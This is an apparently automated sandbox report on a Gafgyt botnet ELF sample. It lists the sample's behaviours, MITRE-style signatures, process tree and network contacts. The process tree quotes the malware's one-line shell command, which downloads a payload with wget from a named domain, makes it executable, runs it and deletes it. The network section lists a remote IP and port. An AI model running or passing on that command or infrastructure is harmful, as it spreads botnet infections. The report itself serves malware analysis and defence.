Malware Analysis Report

2025-08-05 23:59

Sample ID 240402-btybwscf8s
Target e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf
SHA256 e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d
Tags
gafgyt
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d

Threat Level: Known bad

The file e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf was found to be: Known bad.

Malicious Activity Summary

gafgyt

Gafgyt family

Detected Gafgyt variant

Changes its process name

Executes dropped EXE

Modifies Watchdog functionality

Reads system routing table

Reads system network configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 01:26

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt family

gafgyt

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 01:26

Reported

2024-04-02 01:29

Platform

debian9-mipsbe-20240226-en

Max time kernel

117s

Max time network

119s

Command Line

[/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf]

Signatures

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself sshd /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/..... /tmp/..... N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/watchdog N/A N/A
File opened for modification /dev/misc/watchdog N/A N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/..... /usr/bin/wget N/A

Processes

/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf

[/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf]

/bin/sh

[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]

/usr/bin/wget

[wget -q http://gay.energy/.../vivid -O .....]

/bin/chmod

[chmod 777 .....]

/tmp/.....

[./.....]

/bin/sh

[/bin/sh ./.....]

/bin/rm

[rm -rf .....]

Network

Country Destination Domain Proto
MD 85.239.33.129:666 tcp
US 1.1.1.1:53 gay.energy udp
US 1.1.1.1:53 gay.energy udp

Files

N/A